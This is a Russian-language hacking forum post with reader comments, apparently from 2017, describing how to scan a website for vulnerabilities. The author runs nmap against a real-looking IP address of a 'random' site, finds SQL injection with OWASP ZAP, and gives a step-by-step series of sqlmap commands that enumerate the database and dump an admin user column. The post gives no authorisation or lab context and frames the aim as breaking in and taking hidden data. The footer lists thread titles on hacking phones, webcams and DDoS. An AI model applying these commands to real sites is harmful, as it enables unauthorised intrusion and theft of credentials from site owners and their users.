Авторская статья Cканирование сайтов на уязвимости | KALI LINUX

FuckSad_inactive · 22 июн 2017

Cканирование Сайтов на уязвимость - значимая часть в жизни пентестера.

В данной статье мы погворим о взломе определённой цели
Уязвимость помогает злоумышленникам : Проникновенние в систему&Забрать ценную информацию которая спрятанна от постороних глаз.

Утилиты Которые будут использованны : Nmap, Owasp-Zap sqlmap. (Все утилиты идут по умолчанию в дистрибутивах - Kali Linux/ParrotOs(Опционально)

План действий

Сбор Информации о цели

Поиск Уязвимостей

Инъекция.

Cканнирование С помощью Nmap

Я выбрал случайный сайт.

В терминале пишем:

nmap -A 216.250.120.70

Код

nmap -A 216.250.120.70

nmap - запуск утилиты
-A - параметр (Глубокое cканирование)
216.250.120.70 - Ip адресс
IP адресс можно узнать командой - ping www.^site^.com

Cканирование

Запускаем Owasp-Zap и Bбиваем туда наш сайт.
Пошло cканирование:)
(В левом нижнем углу будут расположенны флажочки,они показывают сколько ошибок и их значимость)

У меня нашлось одна критическая ошибка - sql injection

Инъекция
После того как мы нашли уязвимость мы должны "реализовать" её в зависимости от типа уязвимости.
Я буду использывать sqlmap
в терминале пишем:

sqlmap -u www.^site^.com^/уязвимость^ --dbs

Код

sqlmap -u www.^site^.com^/уязвимость^ --dbs

После cканированния у нас будет бд

Нас интересует information_schema
Далее пишем в терминале:

sqlmap -u www.site.com/exploit -D information_schema --tables

Код

sqlmap -u www.site.com/exploit -D information_schema --tables

Мы получаем таблицы.
Выбираем
Нужное нам,я к примеру выбиру tables

sqlmap -u http://www.site.com/exploit -D information_schema -T TABLES --columns

Код

sqlmap -u http://www.site.com/exploit -D information_schema -T TABLES --columns

Получаем "Колонны"

Ничего тут интересного нету:cry:
Ноо,закончим начатое дело,Идём дальше.

sqlmap -u http://site.com/exploit -D information_schema -T TABLES -C TABLE_NAME --dump

Код

sqlmap -u http://site.com/exploit -D information_schema -T TABLES -C TABLE_NAME --dump

И вот тут мы выбираем что нам нужно "сдампить"

sqlmap -u http://site.com/exploit -D information_schema -T TABLES -C admin_user --dump[SIZE=4]

Код

sqlmap -u http://site.com/exploit -D information_schema -T TABLES -C admin_user --dump[SIZE=4]

(ниже логины)

Всем спасибо за внимание,все притензии/вопросы в лс,флудить не стоит,Всем удачи:)

SALCOMP · 22 июн 2017

FuckSad_inactive, Годно

tiko34 · 22 июн 2017

Спс очень информативно мне понравилось)

ReemMiz · 22 июн 2017

годно как раз для учения

Azrooh · 22 июн 2017

Неплохо

renameduser_42470 · 22 июн 2017

Как всегда, топ человек - топ темы)

Fend · 22 июн 2017

годнота

Begin_inactive93067 · 22 июн 2017

Прям хацкером себя почувствовал

UCHIHA_inactive80274 · 22 июн 2017

Годно

Alexkuz2014 · 22 июн 2017

Ничего не понял, симпу влепил... впервые...

divinity · 22 июн 2017

хоть и рассказывает очевидные для меня вещи(дайте повыебываться),но очень годно.Дайте аффтарскую челу-заслужил

divinity · 22 июн 2017

Rezy1337, лицо жалко((

ИмитацияСчастья · 22 июн 2017

крута давно хотел научится этой залупе

Кіберполіція · 22 июн 2017

Ебаный врот, это же шедевр

FuckSad_inactive · 26 июн 2017

Rezy1337 фу, пиарица в чужих темах!1!
Нажмите, чтобы раскрыть...

пруф

GhellikKusss · 27 авг 2017

Солидно!!

Jajadc444 · 30 авг 2017

Basic guide

DartDeth · 8 сен 2017

то, что ты запустил nmap - это ещё не сканирование сайта на уязвимость
ты написал статью, где ты просто достал обычную инфу о сайте, а потом древним методом (кстати говоря, как и на остальных форумах), написал как правильно нужно дампить бд с нубо-сайтов, это может сделать каждый...

Brom93 · 10 сен 2017

Немного не понял логику, что из сканирования nmapom повляло на твое решение просканировать сайт овасп-запом, вернее для чего в данном случае сбор информации был вообще?

Tobi_kun · 27 июн 2018

Просто показал что типа хацкер, смог запустить без надобности nmap.

Форк бомба на Linux.

Есть статьи по maltego?

Пробиваем людей по номеру

Гейминг на Linux: миф или реальность?

Подглядываем за чужой вебкой [Kali Linux]

Разведка для pentesta | принципы разведки | инструменты для разведки

****им RDP, SSH, VNC с помощью Crowbar

Как поиграть в игры на linux лёгкий способ

КАК ХАЦНУТЬ wi-fi?

Базовая информация по сетевому взаимодействию

Установка kali linux на android (termux)

Как установить Kali Linux на флешку с сохранением и без + переходом Gnub ? Мини-Гайд

Взлом ПК с помощью GIF

Взламываем сайты за 5 минут [ Kali Linux ]

Взлом любого телефона Android за пару минут

Создание бэкдора HTTP-сервера Apache

Базовая эскалация привелегий (PrivEsc)

Браузер в консоли Linux

Среда Kali Nethunter в Termux (Перезалив)

[ Kali Linux ] Роняем сайты c помощью "Xerses"

Площадки по пентесту в 2024 году

Взлом Андроид телефона

Взлом Android с помощью Kali (Удаленно)

Решение проблемы подключения ардуино к Ubuntu

Быстрый анализатор ссылок PIDRILA (лучше чем Dirb)

Memcrashed ddos termux

Инструкция по использованию Wifite

Инструменты Kali Linux: мощь тестирования и безопасности (Новичкам)

Установка Python нужной версии на Kali Linux

Взлом/перебор логин-панелей Wordpress

Авторская статья Cканирование сайтов на уязвимости | KALI LINUX